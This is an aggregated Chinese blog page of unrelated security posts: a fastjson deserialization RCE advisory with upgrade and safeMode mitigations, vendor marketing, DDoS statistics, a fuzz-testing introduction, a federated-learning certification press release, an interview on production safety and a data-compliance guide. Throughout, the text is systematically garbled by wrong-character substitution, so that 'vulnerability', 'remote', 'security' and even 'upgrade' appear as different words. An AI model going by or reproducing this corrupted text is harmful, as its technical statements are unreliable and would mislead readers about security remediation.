关于安全:关于fastjson出现反序列化远程代码执行漏洞的通知

近日fastjson呈现反序列化近程代码执行破绽。天翼云揭示用户:请尽快采取措施进行排查与防护。 破绽形容5月23日,fastjson官网发布公告称在1.2.80及以下版本中存在新的反序列化危险,在特定条件下可绕过默认autoType敞开限度,从而反序列化有平安危险的类,攻击者利用该破绽可实现在指标机器上的近程代码执行。 fastjson是开源JSON解析库,它能够解析JSON格局的字符串,反对将Java Bean序列化为JSON字符串,也能够从JSON字符串反序列化到Java Bean。因为具备执行效率高的特点,利用范畴宽泛。 破绽详情破绽名称: fastjson反序列化近程代码执行破绽破绽编号: 暂无破绽类型: 近程任意代码执行组件名称: fastjson影响版本: fastjson ≤ 1.2.80破绽等级: 重大 破绽修复或缓解倡议人工检测:相干用户可应用以下命令检测以后应用的fastjson版本:lsof | grep fastjson注:在fastjson 1.2.68及之后的版本中,官网增加了SafeMode 性能,可齐全禁用autoType。 官网降级:目前官网已在最新版本1.2.83中修复了该破绽,请受影响的用户尽快降级版本进行防护,官网下载链接:https://github.com/alibaba/fa... 降级步骤如下: 备份原fastjson依赖库,防止降级失败的状况产生。2. 将低版本的fastjson库替换为2.83版本即可开发人员可通过配置Maven的形式对利用进行降级并编译公布,配置如下:<dependency>    <groupId>com.alibaba</groupId>    <artifactId>fastjson</artifactId>    <version>1.2.83</version></dependency>注:该版本波及autotype行为变更,在某些场景会呈现不兼容的状况,若遇到问题能够到 https://github.com/alibaba/fa... 寻求帮忙。 长期防护措施:若相干用户临时无奈进行降级操作,也可应用下列形式进行缓解: 因为autotype开关的限度可被绕过,请受影响用户降级fastjson至1.2.68及以上版本,通过开启safeMode配置齐全禁用autoType。三种配置SafeMode的形式如下: 在代码中配置:ParserConfig.getGlobalInstance().setSafeMode(true);加上JVM启动参数:-Dfastjson.parser.safeMode=true如果有多个包名前缀,可用逗号隔开。通过properties文件配置:通过类门路的fastjson.properties文件来配置,配置形式如下:fastjson.parser.safeMode=true参考官网文档:https://github.com/alibaba/fa... 另可通过将有危险的类增加至黑名单进行防护:ParserConfig.getGlobalInstance().addDeny("类名");

June 2, 2022 · 1 min · jiezi

关于安全:融云一图看懂社死的谭某某霸屏的信息安全

5 月 19 日,某高校副院长谭某某在微信工作群发不雅信息,引发全网疯传。据网传聊天记录显示,谭某某随后称,“被盗号了,刚托公安敌人找回来”、“我刚接到欺骗电话!!!”。关注【融云 RongCloud】,理解协同办公平台更多干货。 网传截图 事实果真如此么?吃瓜大众通过多年“网络爆料突遭反转”的冲击,曾经练就了一颗“让子弹飞一会儿”的张望心。 5 月 21 日,“打脸贴”虽迟但到。谭某某所在高校官微公布通报称,对于该校谭某某在微信工作群中公布不雅信息、谎称微信被盗一事,学校高度重视,已于 5 月 20 日成立专项调查组,正在进行考察。近年来,随着某微、某钉等即时通信软件的遍及,各种多人沟通群也随之涌现。从工作群到夸夸群,从团购群到砍价群,性能不一,主题多样。 但像上述新闻事件,不论是真被盗号遭戏耍,还是一时嘴瓢酿大祸,都不能成为不雅信息呈现在工作群里的理由。尤其是在政府、金融、企事业单位等相干场景中,设想一下,如果是涉密信息被公开流传,将会造成多大的影响? 所以,为了躲避此类景象产生,爱护信息安全,晋升即时通信信息管控能力势在必行。针对此背景,融云推出了可私有化部署、具备高平安性能的对立通信平台平安计划。 信息即时传递,连贯随时产生;平安防备第一,融云惯战能征!

June 2, 2022 · 1 min · jiezi

关于安全:服务器运维环境安全体系上篇

(点击报名) 总有一些突发事件揭示咱们,网络安全的重要性。关注【融云寰球互联网通信云】理解更多 5 月 25 日,“搜狐整体员工遭逢工资贴补欺骗”的新闻冲上热搜,令人咋舌。当天下午,搜狐公布申明称,不法分子假冒财务部盗发邮件,24 名员工被骗 4 万余元。从额度和手法上看,这个事件都算是一般级别,但人们的哗点在于,它产生在出名的互联网企业。也从另一个角度阐明,公众对于网络安全的关注水平正在晋升。 网络安全问题随同着互联网的高速倒退日益严厉,新经济业态使得各要害行业和重要系统对网络安全保障的需要一直减少,平安已成为网络强国建设的根底保障。同时,企业的平安生产也离不开平安相干的技术保障,因而每一个企业都须要构建一套自上而下欠缺的平安解决方案。 本文围绕服务器运维环境平安体系开展,通过上、下两篇,剖析网络安全现状并提出应答之策。 网络安全现状当下硬件、软件和协定或零碎安全策略的具体实现上存在的缺点,使入侵者能够在未经许可的状况下非法拜访和毁坏零碎及零碎中数据。同时,从拜访的角度来看,当零碎运行与系统安全发生冲突时,也会产生安全漏洞。 破绽问题也与工夫密切相关,随着软件的深刻应用,软件破绽将一直裸露。老破绽一直被攻克,新破绽一直呈现,破绽问题会长期存在。随着数字化过程的一直演进,大量新型互联网产品和服务应运而生。安全漏洞、数据泄露、网络欺骗、勒索病毒等网络安全威逼也日益凸显,有组织、有目标的网络攻击局势更加重大。 如以下图片所示,恶意程序捕捉、计算机恶意程序用户感化、安全漏洞、DDoS 攻打等威逼不容小觑,为网络安全防护工作带来更多挑战。(恶意程序捕捉状况,起源:国家互联网应急核心) (计算机恶意程序用户感化状况,起源:国家互联网应急核心) (安全漏洞状况,起源:国家互联网应急核心) (DDoS 攻打状况,起源:中国互联网络信息中心) 因为攻打成本低、成果显著,DDoS 攻打是目前互联网用户面临的较常见、影响较重大的网络安全威逼之一。 为升高 DDoS 攻打对我国根底网络和基础设施的威逼,国家互联网应急核心继续对境内指标遭大流量攻打状况做监测跟踪,针对所发现的被用于进行 DDoS 攻打的网络资源重点发展治理。 境内指标遭大流量 DDoS 攻打状况:2020 年在监测发现的境内指标遭峰值流量超过 1 Gbit/s 的大流量攻打事件中,攻击方式为 TCP SYN Flood、UDP Flood、NTP Amplifi cation、DNS Amplifi cation、SSDP Amplification 的占比达 91.6%; 攻打指标次要位于浙江省、山东省、江苏省、广东省、北京市、上海市、福建省等 7 个地区的事件占比达 81.8%; 12 月是全年攻打最高峰,攻打异样沉闷。经剖析发现,攻打时长不超过 30 分钟的攻打占比达 94.4%,表明以后攻击者偏向于综合应用攻打资源,利用大流量攻打刹时打瘫攻打指标,以对外提供更多服务并非法获利。 被用于进行 DDoS 攻打的网络资源沉闷状况:依据国家互联网应急核心的《我国 DDoS 攻打资源季度剖析报告》,与 2019 年相比,境内各类被用于进行 DDoS 攻打的网络资源(简称“攻打资源”)数量继续缩小,境内沉闷管制端数量同比缩小 47.6%,受控端数量同比缩小 39.9%,沉闷反射服务器同比缩小 20.4%,跨域伪造路由器同比缩小 59.1%; 与此同时,境外各类攻打资源数量一直减少,境外沉闷管制端数量同比增加 27.6%,受控端数量同比增加 37.0%,沉闷反射服务器同比增加 0.3%,攻打资源向境外迁徙趋势显著。 ...

June 2, 2022 · 1 min · jiezi

关于安全:能够发现零日漏洞模糊测试威力几何

含糊测试作为一种平安防护伎俩,被越来越多的企业或组织用来构建应用程序平安防护体系,诸如时下火爆的云原生中,泛滥开源我的项目就采纳了通过集成含糊测试的形式来发现安全漏洞(尤其是零日破绽),从而进步我的项目品质。 含糊测试的定义维基百科的定义是:“含糊(fuzzing)或含糊测试(fuzzing testing)是一种自动化的软件测试技术,通过向计算机程序输出有效的、非冀望的、随机的数据,来察看程序是否产生了解体、外部断言故障或潜在的内存透露等问题“。 演进到当初,含糊测试曾经成为一种罕用的应用程序平安测试,次要用来发现应用程序中的功能性缺点、平安问题等。含糊测试曾经被越来越的企业或组织所应用,CNCF 中的多个我的项目都在应用含糊测试,诸如 Argo,Envoy,Fluent-bit,Kubernetes 等,相应的含糊测试器也托管在 cncf-fuzzing Repo 中。 含糊测试的历史“含糊”(fuzz)这个术语最后是由 Barton Miller 传授在上世纪 80 年代发明的。Miller 传授在一次风暴中,通过拨号上网来近程登录了一个 Unix 零碎,整个过程中在拨号链路上有大量的烦扰乐音,导致应用内部数据的应用程序产生了解体。Miller 传授趁势给他在威斯康星大学的学生设置了一个我的项目,题目叫做操作系统实用程序的可靠性(Operating System Utility Program Reliability)。在 Fuzz Generator 中,学生要开发一个命令行 fuzzer,通过用随机数据轰炸 Unix 程序并监测任何异样或解体,从而来测试 Unix 程序的可靠性。 在含糊一词被发明之前,最早应用相似概念的是 1983 年 Steve Capps, 他开发了一个叫做“猴子”的应用程序。Steve 始终在编写一个工具,利用所谓的“Journaling Hook”形式,能够让电脑通过回放以前记录的动作来演示本人。这个软件被 Steve 从新利用来发明随机的鼠标点击和键盘输入,以测试 MacWrite 和 MacPaint 应用程序,在任何观察者看来,这就像一只看不见的猴子在无规律的应用电脑一样(这也是应用程序由此得名的起因)。 从 Miller 传授的偶尔发现到当初,含糊测试曾经倒退成为了一种备受推崇的技术,用于测试软件在收到意外或有效输出时的可靠性。含糊测试当初次要被用来进行软件的安全性测试,泛滥供应商都在宣传本人宽泛的含糊测试工作,旨在进步软件的健壮性。 含糊测试的益处保障利用平安:含糊测试是以“think like a hacker“的思路来实际的平安测试伎俩,可能发现惯例检测办法难以发现的问题,诸如难以发现的“零日破绽”(zero-day vulnerabilities)等,进一步保障了应用程序的平安。低成本高效率:一旦含糊测试器(fuzzer)运行起来当前,就能够在无需人为干涉的状况下继续一直的对应用程序进行自动化的平安测试,而且可能尽早的发现平安问题,不便相干人员在软件开发的晚期尽快解决平安问题,整体的修复老本会大大降低。极狐GitLab 含糊测试含糊测试是极狐GitLab DevSecOps 性能中的其中一个平安性能,其余的平安性能有SAST、SCA、License 合规检测、密钥检测、容器镜像平安扫描、DAST、IAST。这些平安防护与保障能力可能笼罩软件生产全生命周期,助力用户疾速打造高效、平安的 DevSecOps 体系。 极狐GitLab含糊测试反对对 C/C++、Golang、Rust、Java、Python 等语言的应用程序进行含糊测试。上面演示用极狐GitLab 含糊测试来发现 golang 代码中的 index out of range 问题。Demo 仓库地址为:https://jihulab.com/fuzzing-t...。 可能导致程序解体的代码示例如下: ...

May 31, 2022 · 2 min · jiezi

关于安全:国内首家百度点石联邦学习平台获得联邦学习产品安全认证证书

2022年5月17日,百度点石联邦学习平台正式取得联邦学习产品安全认证证书,百度成为国内首家取得该项资质的单位。“联邦学习产品安全认证”是由中国信息通信研究院(以下简称“中国信通院”)泰尔终端实验室、平安研究所以及中国互联网金融协会中互金认证单干推出的认证资质,是金融行业互联网产品的权威认证。通过该项认证不仅体现了百度对于数据安全隐衷爱护相干工作的器重,同时也展现了百度在隐衷计算畛域的多年积淀与积攒。 数据作为数字经济和信息社会的外围资源,被认为是继土地、劳动力、资本、技术之后的又一个重要生产因素,其在企业数字化转型中施展重要作用,并对国家治理能力、经济运行机制、社会生存形式等产生深刻影响。随同数字经济的蓬勃发展,数据安全的重要性日益凸显。2020年4月,中共中央、国务院颁布了《对于构建更加欠缺的因素市场化配置体制机制的意见》明确提出“放慢培养数据因素市场”是倒退数据因素市场体系的重要动作,有利于实现数字经济高质量倒退,重塑国际竞争新劣势,开释数字化转型后劲。随着国家的悉心培养,全国至多已有21个省级机构设置大数据局,142个市级机构设置大数据局,其中,成都、深圳、珠海等地的大数据中心已率先筹建隐衷计算平台。 秉持敢为人先,开拓进取的精力,百度平安点石团队厚积薄发,通过多年积淀,在隐衷计算畛域获得了丰硕成果,其在Apache的开源我的项目(Teaclave)热度一度超过谷歌和微软的隐衷计算我的项目,在国内,百度点石联邦学习产品亦广受好评,受到了金融、政府、企业界等诸多业内客户的青眼。 百度联邦学习平台依靠百度平安在MPC、FL、DP等数据安全及隐衷爱护方向当先的平安技术积攒,采纳集群分布式、并发计算、算法优化等策略,在实现了十亿级规模的大数据计算的同时保障了联邦计算的平安可控。另外,百度联邦学习平台反对FPGA、GPU硬件加速,横向扩大,保障了联邦计算的稳固高效。独特设计的DSL语言以及丰盛的内置算法,灵便满足了简单计算场景。依靠百度同学们多年的不懈努力,百度点石联邦学习平台目前能够提供数据核实、匿踪查问、联结剖析、联结建模、在线预测等多项性能服务,为跨企业数据交换提供了“可用不可见,相逢不相识”的平安体验。在部署方面,百度点石联邦学习平台能够反对私有化+私有云的部署形式,并且可能与区块链、边缘计算等业务进行交融,可能解决金融、政府、营销、医疗等行业的多场景需要,无效保障各参与方的数据安全流通。 以普惠金融为例,基于百度的联邦学习算法能够使得金融企业、征信、社保等多项数据可能在“数据不出域”的状况下实现平安交融,进而建设起中小微企业的精准画像与实在资信情况,提供其融资可得性,通过联邦学习建设更多维贷款数据分析体系,优化信贷风控模型,升高贷款逾期和不良金额,晋升银行贷后治理效力,促成银行贷款业务的良好倒退。 将来,百度将持续秉持与时代共赴潮头的初心,保持技术创新,继续深耕技术前沿,紧随时代与国家须要,为推动数字经济继续衰弱倒退一直致力。在基础设施智能化革新、产业数字化转型等诸多畛域,百度平安将持续施展技术劣势,继续推动联邦学习、秘密计算、数据安全沙箱等诸多前沿技术在金融、政务、科研、企业数字化转型等诸多场景下的利用施行,为建设平安高效的数据因素市场增砖添瓦,为促成数字经济疾速倒退砥砺奋进。

May 31, 2022 · 1 min · jiezi

关于安全:畅聊安全生产对话B站唯品会一线专家|TakinTalks大咖对谈

“平安生产”是业界新衰亡的一种概念,来源于传统行业,增强平安生产就是为了避免和缩小生产安全事故 ,保障人民大众生命和财产平安,促成经济社会继续衰弱倒退。 随着互联网倒退,数字经济在经济总量中占比超30%,在以IT零碎为次要撑持的新兴互联网企业中,各类系统故障虽不会造成人员挫伤,但给企业带来的损失却不容小觑,除了间接的经济损失还会造成用户的大量散失,重大侵害企业形象。 正因如此,数字化业务也须要“平安生产”,构建欠缺的平安生产体系能帮忙企业解决以后的痛点问题: 1.互联网企业系统安全生产根底建设单薄; 2.技术人员不足体系与标准的指引; 3.平安生产监督单薄,无奈落实到位;数列科技微服务系统安全生产(稳定性治理)建设总体框架 本期【大咖对谈】咱们邀请到了互联网企业的行业代表、TakinTalks社区的三位讲师——B站直播B&C端架构组leader吕帆、唯品会中间件技术专家陈俊峰、数列科技联结创始人杨德华 ,就流动保障效率、混沌工程、人员标准治理、平安生产等方向做了深入探讨,以下为对谈精彩片段,心愿能对你有所启发—— (文末附查看完整版回放视频形式) 专家介绍 专家观点碰撞1.流动保障是很多企业都要做的事件,除了保障成果,保障的老本和效率成了大家最为关注的问题,有没有什么降本增效的好办法? B站吕帆: 流动保障中压测是投入人力最多的,过后应该有二三十人一起去做这个事件,其中比拟麻烦的事件就是链路梳理这一块,过后压测链路梳理花了3周工夫,不过B站的压测场景不会变动很大,另外新公布的性能,比如说咱们最近做的虚构主播这一块儿的货色它流量并不是特地高对稳定性也不会有大影响,所以梳理一次外围压测场景和脚本后续能够复用,这样就能为后续的流动保障降本增效。 在晋升效率方面的话,其实还有一个十分重要的点,当你把一些筹备工作做到极致的时候就会省很多事件,比如说咱们有几个场景是须要一起压测的,独自压测的后果是有效的,那筹备短缺就不会产生这样的事件。 数列杨德华: 数列科技帮忙了很多企业比方顺丰、中国移动、中国人寿等企业在生产环境做全链路压测,他们也会特地关注保障效率和老本的问题,像是链路梳理这块比拟占用人工和工夫的工作也是重点提效的局部。某些企业因为业务变更频繁、依赖也时常变动,数列科技开源产品Takin也是根据用户需要欠缺了链路主动梳理的性能,能够帮忙企业在链路梳理上缩小工夫破费,无效提效50%以上。 唯品会陈俊峰: 的确每次大型流动的保障要花费很多的工夫跟人力,咱们最近也有在做优化方向的事件,有业务层面和技术层面的动作。 像业务层面就是更新了流动玩法,进行促销日常化,不会把大促的流量全副引到集中的工夫点,例如双十一不会只是当天早晨开售,而是从11月1日就开始了,让流量均摊一些,那么保障压力也会加重。 技术层面的话就会波及到底层组件的产品化成熟问题,咱们目前是曾经有了压测平台,集成了几种压测形式。像之前压测各个团队都是各自在本人的压测环境中进行,包含录制流量回放也是各自实现的,当初这块做了整合,把标准化的流程做到产品里,这样也对人效的进步有很大的帮忙。 2.把问题提前扼杀在摇篮里是最好的保障伎俩,混沌工程、故障演练开始进入公众视线,那它到底是如何失效的? B站吕帆: 保障工作的外围还是在于人,线上零碎异样是没有方法防止的,那咱们除了要锤炼零碎的稳定性,还应该锤炼参加保障的人,让他们可能临危不乱,沉着及时地解决问题。混沌工程的重要环节就是故障演练,也是锤炼人和零碎的次要伎俩。目前B站的演练并不是线上演练,而是在演练环境进行,因为线上演练容易产生脏数据净化生产环境,所以咱们采纳复制流量+复制环境的办法,将来咱们也将持续精进。 数列杨德华: 混沌工程目标是提前发现和解决问题,保障系统稳固和用户体验晋升。零碎稳固是咱们谋求的后果指标,混沌工程是咱们能够晋升过程类指标的一个新的无效做法。数列科技的很多客户,也在这方面有所实际,他们少数也是以故障演练作为切入点。而故障演练在现实状况下的流程应该是:例行化故障演练、找出零碎危险点、优化业务零碎、产出可行无效的故障解决预案。 唯品会陈俊峰: 混沌工程还是很有用的,化被动为被动,让故障提前产生,来看零碎的体现,也能提前准备预案去应答。目前咱们有搭建隔离环境去做混沌工程的事件,也有相干的产品雏形,只是目前还没有落地到生产环境。毕竟要在生产落地混沌工程还是须要肯定勇气的,除了要对系统有很大的把握,还得自上而下地去推动这个事件能力真正地落地。 3.保障工作的外围在于人,各种标准开始流行,可怎么制订与落地又成了新的难点,有没有什么好的做法? 数列杨德华: 咱们中国有句老话叫无规则不成方圆。同时瑞达利欧也专门写了一本书叫《准则》。在肯定水平上来说,标准等同于准则,也就是说话、行事所根据的准则。标准其实就是一种管理手段,即便是针对零碎制订的标准其实次要针对的还是人。在制订标准的初期就应该明确标准制订的目标以及具体的利用范畴,这样能力更有针对性。 我这边也有一个想法,是不是能够参考“故障演练”去被动注入一些违反标准的事件,看看负责人员是否发现,以此获取疾速的反馈,将来可能这块也能尝试。 B站吕帆: 对于标准怎么落实,做所有的事件都会考究ROI,不用强制要求所有服务符合规范,次要要求外围业务合乎相干标准。另外咱们会通过一些特定的工具进行review,平时的宣导、培训也会无意识地去增强大家的标准意识,针对外围业务咱们还会有处罚机制,触犯相干标准就会触发处罚,对应人员是须要负责任的。 唯品会陈俊峰: 标准和流程的制订咱们少数是依据教训来的,从过往的badcase和goodcase中总结进去,这样也会更符合实际的利用场景,对于落地的阻力也会加重。至于标准的理论落地,咱们往往会联合着平台工具来实现,更规范也不便测验回顾与更新迭代。 4.“平安生产”是业界新衰亡的概念,对此有什么认识? 数列杨德华: 数字化业务方面的平安生产区别于传统行业,跟用户体验、业务的失常运行是严密相干的。目前一些企业应用波及国计民生、基础设施的业务,从故障起因的注入、故障产生到故障发现再到技术人员上线,什么时候能定位,什么时候能复原,都会有精细化的一些指标。提前制订好指标,围绕指标去进行演练或者通过实在的故障去review这些工夫点,先看外表问题再找根因。置信将来这些内容会缓缓造成一套通用的规范。 平安生产,最终目标是0重大故障,当然很多企业每个月都会呈现重大故障,所以大部分企业在落地的时候,会以升高重大故障数量作为阶段性指标,进而谋求0重大故障。为了最终达成0重大故障,须要去度量整个研发流程的危险状况,进而去做到提前解决。 唯品会陈俊峰: 平安生产目前对咱们一线技术来说的话就是防止系统故障,很多重大故障的起因就是一些小变更,因为变更人员的漠视,小问题缓缓变成大问题最初导致生产大故障,所以人员的束缚、变更监控这些都是很重要的事件。唯品会接下来也会在混沌工程常态化、容量布局自动化、单元化等中央发力。 B站吕帆: 对于平安生产咱们次要是围绕“一五十”的概念去开展的,也就是1分钟发现5分钟定位10分钟解决,但咱们没有全副强制要求和度量。S11的时候大家都坐在一起,那处理速度就会更快,但平时或者非核心业务要做到“一五十”,要求就有些高了。当然“一五十”“多活”“多机房部署”等等也是咱们将来要继续倒退的方向。 精彩回放地址:https://news.shulie.io/?cat=5&cnel=ff530

May 30, 2022 · 1 min · jiezi

关于安全:亿信华辰企业数据合规建设全指引来了

随着大数据、云计算、人工智能等新兴技术在数字经济中宽泛使用,数据因素已成为引领中国高质量倒退的一个新引擎。但随之而来, 数据的分布式存储、多渠道流转、多业务共享已成为常态,数据流动场景复杂性增大,新的信息安全危险点由此延长。 与此同时,我国的数据安全也迈入了强监管时代。《网络安全法》《数据安全法》《个人信息保护法》等法律陆续出台,健全了我国数据安全法律法规矩阵,构建了我国网络空间治理和数据保护的基本法,对企业的数据收集以及应用等各环节,做出了明确标准和要求。 在此背景下,企业数据合规也面临着更高的要求。那么,什么是企业数据合规? 企业数据合规是指企业对数据采取的行为合乎所在地与业务关联地法律法规的要求。企业从数据的收集、解决、贮存,到转让、删除、销毁,都须要按照相干法规来执行。 做好数据合规,能帮忙企业防止关法律危险,促成企业良性倒退;同时也能确保企业能够继续、非法的应用相应的数据,以及领有相应数据产品的财产权利,帮忙企业保护好数据资产。 01、数据合规监管框架 要做好企业数据合规,咱们首先须要理清以后的数据合规监管框架。 从次要的法规、监管政策公布施行工夫来看,自2019年起,数据合规和爱护逐步进入到强监管的时代。2013年的《电信和互联网用户个人信息爱护规定》就个人信息的收集和应用标准以及企业须要采取的平安保障措施作出专章规定,其中确定的大部分准则连续至今。 2017年,《网络安全法》开始施行,该法作为网络安全畛域的第一部法律,在网络运行平安和网络信息安全方面提出了数据保护和个人信息爱护的要求。 2019年初,工信部、网信办、公安部、市场监管总局独特以一则《发展APP守法违规收集应用个人信息专项治理的布告》启动了继续到当初的专项整治口头。 2020年10月1日,市场监督总局和国家标准委员会联结公布了GB/T35273-2020《信息安全技术集体信息安全标准》,从数据处理全流程的流动准则和平安要求上作出全面规定。 2021年1月1日施行的《民法典》则是从根本法律的高度上明确了个人信息受法律爱护。 2021年8月1日,最高院《对于审理应用人脸识别技术解决个人信息相干民事案件实用若干问题的规定》成为第一个针对特定个人信息(人脸)爱护作出的司法解释。 2021年9月1日,确立数据安全及治理根本框架的《数据安全法》施行。 2021年11月1日,针对个人信息爱护的《个人信息保护法》施行。另外,公安部2019年公布的《互联网集体信息安全爱护指南》、信标委2020年7月公布的《网络安全规范实际指南——挪动互联网应用程序(APP)收集应用个人信息自评估指南》、9月公布的《网络安全规范实际指南——挪动互联网应用程序(APP)个人信息爱护常见文集及处理指南》也是常常被提及和参考的一些文件。 上述文件,独特构筑了当下数据合规的监管框架。 02、常见的数据合规危险类型 进犯个人信息 大数据技术的倒退给生产生存带来了便当,但如若滥用技术、适度收集和应用集体数据,会造成对个人信息的进犯,触发数据合规问题。这一危险景象在一些APP中时有发生,比方一些APP会应用默认受权的形式来强制用户批准APP对其个人信息的收集、或是要求开启与其服务无关的权限。 2021年5月1日施行的《常见类型挪动互联网应用程序必要个人信息范畴规定》(以下简称《规定》)对此做了相应标准与界定,明确了39种常见类型App必要的个人信息收集范畴,同时要求App不得因为用户回绝提供非必要个人信息而回绝用户应用其根本服务。 进犯消费者权利 这一危险次要存在于企业的数据利用阶段,比方常见的“大数据杀熟”景象,同样的商品或服务,老客户看到的价格远高于新客户的价格。这一景象本质上是企业对大数据算法等技术手段的滥用。 对此,相干机构也出台了明文规定:文化和旅游部在《在线游览经营服务治理暂行规定》中要求在线游览企业不得滥用大数据分析进犯旅游者的合法权益;市场监管总局公布了《对于平台经济畛域的反垄断指南》征求意见稿,力求进一步增强对互联网平台不偏心价格行为的监管。 进犯商业秘密 商业秘密数据是指对企业生产倒退和竞争力具备重要价值的企业数据,如客户资料、生产数据等。企业既存在着商业数据机密被别人进犯的危险,也存在着进犯别人商业数据机密的危险。比方一些企业利用把握其余企业商业数据机密的员工跳槽所带来的相干数据进行业务拓展,或者利用尚未公开的技术数据进行新产品开发等,都存在进犯商业秘密的危险。 进犯计算机/信息网络违法犯罪 企业数据危险不仅包含民事上的涉诉危险,还可能使企业及管理层面临刑事责任危险。 例如“爬虫”是企业高效提取并利用数据最罕用的网络信息搜寻技术,但若“爬虫”行为未在法律框架内施行,则可能给企业带来重大的刑事结果。如在数据获取环节,利用“爬虫”非法获取其余计算机信息零碎中存储、解决或者传输的数据的,可能涉嫌“非法获取计算机信息零碎数据罪”;烦扰其余网站失常经营,或者成心制作、流传病毒等破坏性程序,影响计算机系统失常运行的,可能形成“毁坏计算机信息零碎罪”。 违反网络安全爱护或信息网络安全治理任务 数据安全问题始终以来都是用户关怀的重点,也是企业该当重点关注的事项。在信息网络安全治理方面,如企业作为网络服务提供者不履行法律法规规定的信息网络安全治理任务,经监管部门责令采取改过措施而拒不改过导致守法信息大量流传、用户信息泄露等的,则可能形成拒不履行信息网络安全治理任务罪。 数据跨境流动合规危险 企业若未经国家相干部门批准而将数据擅自传输至国外也可能面临形成《刑法》中国家平安立功的危险。《评估指南》和《评估方法》中也均要求可能影响国家平安、经济倒退、公共利益的数据在入境前应先报请行业主管或监管部门组织平安评估。 《网络安全法》第六十六条规定了要害信息基础设施的运营者守法在境外存储网络数据或者向境外提供网络数据的,将由无关主管部门进行行政处罚或对主管人员处以罚款。除了《网络安全法》、《数据安全法(草案)》等数据安全专门法律法规的规定之外,一些业余畛域方面的法律规定中也对数据跨境流动进行了限度,若未留神可能会受到相应的行政处罚。03、企业如何做好数据合规? 建设数据合规框架体系一个齐备、高效的外部合规治理组织体系,是做好企业数据合规的根底保障。企业能够以“专家+工具”模式,根据国家法律法规、下级监管部门、国标行标及企业外部数据安全相干要求,围绕数据生命周期各环节中数据采集、传输、存储、应用、共享、销毁的数据分布、数据分类分级、业务场景、数据流转环节及管控措施等详情开展梳理、收集与剖析,把控各个节点的法律危险,并对应提出相应合规计划。 在工具层面,亿信华辰的数据治理产品睿治就是一个辅助保障数据安全合规的优良工具,它将数据安全治理贯通于数据治理全过程,能够提供对隐衷数据的加密、脱敏、模糊化解决、数据库受权监控等多种数据安全治理措施,全方位保障数据的平安合规运作。 同时,在企业横向层面,企业各个部门都该当建设数据合规管理制度,清晰各职能部门、各工作人员的责权利,让合规要求落实到每个环节及责任人,使相应的制度具备约束力和警示作用。 此外,还需建设一个常态化的合规策略体系,使平安合规继续同步法律法规要求及业务倒退须要,造成从制订打算、评估平安、执行解决方案、到总结经验的数据安全闭环治理流程,使数据安全合规建设对症下药、平安标准规范落地、平安能力循序晋升。 在构建企业合规体系时,须要留神的是企业数据安全合规治理组织体系应是与企业现有管理体系高度交融的,不是重整旗鼓,否则老本过高且难以失常运行。而且,数据安全合规重点是因人而异的,即不同行业、不同服务对象、不同规模的企业重点不同,在合规治理组织体系建设中也应充沛联合企业特色突出重点、管好难点,并且与企业其余合规要求协调同步,彼此增益。 建设企业数据安全能力要做好数据合规,离不开建设欠缺的数据安全技术体系,围绕数据合规的各项要求,建设与制度流程相配套并保障无效执行的技术和工具。企业在进行数据安全技术体系建设时,需从数据安全治理、数据安全防护、数据安全监测与审计三方面来增强能力建设。 (1)数据安全治理能力数据安全治理是指实现数据安全治理流程、策略、标准及数据资产的电子化、信息化治理。企业须要对重要数据、敏感数据进行全面排查梳理,并依据业务须要对不同角色接触、解决数据的权限进行梳理。针对不同的拜访需要,标准数据拜访权限,并严格记录拜访状况,实现外部数据操作行为的无效管制与监管。同时也要装备各环节相应的应急处理机制,一旦产生安全事件,确保企业有欠缺的应急预案和应答解决机制,避免事态进一步扩充。 (2)平安防护能力企业需建设数据全生命周期的平安防护能力,如数据加密、脱敏、数字水印、访问控制、数据防泄露等,撑持数据安全管理工作的落地执行。平安防护能力的建设次要可从以下三个方面来切入。①脱敏流转。即在数据应用流转过程,遵循数据最小应用准则,去标识,去隐衷,实现数据的平安高效利用,在平安的前提下晋升数据的应用价值。②密文存储。即落实重要数据辨认和分类分级爱护要求,对重要的外围数据加密存储,守护数据安全。③入侵进攻。即建设、查看数据库防火墙,以便对外部攻打进行无效防护,同时也对外部数据库破绽进行无效防护,避免破绽被违规利用。 (3)数据安全监管与审计能力企业需构建一个可控、可查、可见的对立的外部数据安全闭环监管体系,从数据产生,到场景化应用,进行流向监控、精准剖析,实现无效监管;通过对数据安全危险及业务数据场景的继续经营,梳理资产、数据、用户、权限等要求,领导平安技术、治理、经营能力的体系化建设与合作。 强化人员数据合规意识与能力数据安全合规治理是多元主体独特参加的过程,其中人员是数据安全各项要求无效施行的基石,也是平安危险的重要起源,应增强人员安全意识造就、技能晋升、标准流程演练,以明确平安职责、部门协同机制等,晋升应急响应与处理能力。 (1)建设人员安全意识造就机制通过定期发展培训,将法律法规、标准规范、案例事件等进行宣贯,逐渐晋升人员对数据安全的价值意识和威逼辨认能力。 (2)增强合规治理参加人员的技能培训对不同岗位的人员制订科学合理的培训打算,依照必备优先,先根底、后业余、再全面的准则,逐渐晋升人员的专业技能。 (3)建设应急演练机制通过定期或事件触发机制,对理论业务场景中的各类危险主题的解决形式、合作流程及响应机制等进行模仿演练,确保安全措施落实到位,平安处理流程正确无效等,全面晋升数据安全合规治理经营保障能力。 04、小结 以后局势下,企业数据合规面临着更高的挑战,更高的要求,这也意味着企业在数据合规方面的投入也会随之减少。于是很多企业把数据合规看作是一项老本累赘。但在数据安全步入法制时代的新形势下,企业应转变观念,充分认识数字经济倒退新局势和数据安全合规治理的新变动新需要,保持合规优先,倒退并进,急用后行,逐层推动准则,构建迷信的数据合规治理制度体系,让数据更好且更标准地驱动倒退。

May 27, 2022 · 1 min · jiezi

关于安全:非法接码平台月流水超百万元-渐成羊毛党帮凶

